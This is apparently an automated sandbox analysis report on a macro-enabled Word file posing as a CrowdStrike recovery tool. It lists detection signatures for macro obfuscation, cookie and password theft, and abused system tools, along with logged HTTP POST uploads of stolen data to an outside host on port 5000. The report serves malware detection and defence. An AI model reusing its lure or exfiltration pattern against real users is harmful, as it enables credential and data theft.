Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID: 1478411
MD5: dd2100dfa067caae416b885637adc4ef
SHA1: 499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256: 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags: docm

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to steal Chrome passwords or cookies
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes

Classification

AV Detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008AF02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 13_2_008AF02B
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008AF820 CryptAcquireContextA,CryptCreateHash, 13_2_008AF820
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008AF860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 13_2_008AF860
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008A6400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 13_2_008A6400
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008AEC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 13_2_008AEC10
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008A6591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 13_2_008A6591
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008A3EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, 13_2_008A3EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008AC6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 13_2_008AC6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008AC730 CryptHashData, 13_2_008AC730
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 13_2_008AC750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 13_2_008AC750
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C15E30 BCryptGenRandom, 16_2_00007FFD92C15E30
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92BF2210 new,CryptStringToBinaryA,delete,delete,delete,CryptStringToBinaryA,CryptUnprotectData,new,delete,delete,delete, 16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92BF2E60 new,new,new,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,BCryptDecrypt,BCryptDecrypt,BCryptCloseAlgorithmProvider,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit, 16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C39500 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 16_2_00007FFD92C39500
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C15B90 BCryptGenRandom, 16_2_00007FFD92C15B90
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C65EE0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 16_2_00007FFD92C65EE0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C65E90 CryptAcquireContextA,CryptCreateHash, 16_2_00007FFD92C65E90
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C65F70 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 16_2_00007FFD92C65F70
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C5E0B0 CertOpenStore,GetLastError,CertCreateCertificateChainuser,GetLastError,CertGetCertificateChain,GetLastError,CertFreeCertificateChainuser,CertCloseStore,CertFreeCertificateChain,CertFreeCertificateContext,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,_heap_alloc, 16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C64530 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 16_2_00007FFD92C64530
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C645B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 16_2_00007FFD92C645B0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C645A0 CryptHashData, 16_2_00007FFD92C645A0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C5E990 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 16_2_00007FFD92C5E990
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C66EC0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 16_2_00007FFD92C66EC0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087F820 CryptAcquireContextA,CryptCreateHash, 33_2_0087F820
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 33_2_0087F02B
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 33_2_0087F860
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_00876400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 33_2_00876400
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 33_2_0087EC10
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_00876591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 33_2_00876591
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_00873EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, 33_2_00873EA4
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 33_2_0087C6E0
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087C730 CryptHashData, 33_2_0087C730
Source: C:\Users\user\AppData\Local\Temp\curl.exe Code function: 33_2_0087C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 33_2_0087C750
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_eb710474-e
Source: C:\Windows\System32\rundll32.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 16_2_00007FFD92C4D7E0
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock, 16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError, 16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete, 16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12, 16_2_00007FFD92CCDD10
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe
Source: winword.exe Memory has grown: Private usage: 1MB later: 100MB

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 172.104.160.126 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknown Network traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknown Network traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknown Network traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknown Network traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknown Network traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknown Network traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknown Network traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknown Network traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknown Network traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknown Network traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknown Network traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknown Network traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknown Network traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknown Network traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknown Network traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknown Network traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknown Network traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknown Network traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknown Network traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown Network traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknown Network traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknown Network traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknown Network traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknown Network traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknown Network traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknown Network traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknown Network traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknown Network traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknown Network traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknown Network traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknown Network traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknown Network traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknown Network traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknown Network traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknown Network traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknown Network traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknown Network traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknown Network traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknown Network traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknown Network traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknown Network traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknown Network traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknown Network traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknown Network traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknown Network traffic detected: HTTP traffic on port 5000 -> 49338
Source: global traffic TCP traffic: 192.168.2.6:49191 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 763 | Content-Type: multipart/form-data; boundary=------------------------f9fa7306880345da
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 160166 | Content-Type: multipart/form-data; boundary=------------------------f13a1e66d9ac3858
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 106918 | Content-Type: multipart/form-data; boundary=------------------------3db099609e8ee48c
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 5243310 | Content-Type: multipart/form-data; boundary=------------------------f661165eccdedd9d | Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------2fe595d5319db200
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------4b737e61e1b7e9bf
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------4e35b57d9f58fc90
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------815ab7d36e08e457
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------a5d52e19e3fe200b
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------ec3ba31dfe96d326
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------f22aeea0bd5a0f8e
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------d8bdcfc228d82f5a
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------cfe9280e100efce1
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------904a2babf6d2f7ac
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------f49946b6384ac060
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------b85ce3e308f45060
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------614e08f55f0c2cfe
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------bea6c7b09692f28c
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------23dd402f4b4a39c5
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------e591042c4603c21a
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------a0f76a6adccf351c
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------c4d90e433018b142
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------d2ca679a5d8f632b
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 763 | Content-Type: multipart/form-data; boundary=------------------------72fb5c35750f8204
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 160166 | Content-Type: multipart/form-data; boundary=------------------------43289e4b14c04ac7
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 106918 | Content-Type: multipart/form-data; boundary=------------------------71ca7f7e591272d4
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 5243310 | Content-Type: multipart/form-data; boundary=------------------------727b88163de31621 | Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------528cb38273400043
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------6ceab3228cef8607
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------a158dee7d748d662
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------5e2d7668485dfa80
Source: global traffic HTTP traffic detected: POST /Uploadss HTTP/1.1 | Host: 172.104.160.126:5000 | Accept: */* | Content-Length: 1456 | Content-Type: multipart/form-data; boundary=------------------------0f7ba0280905d0a7
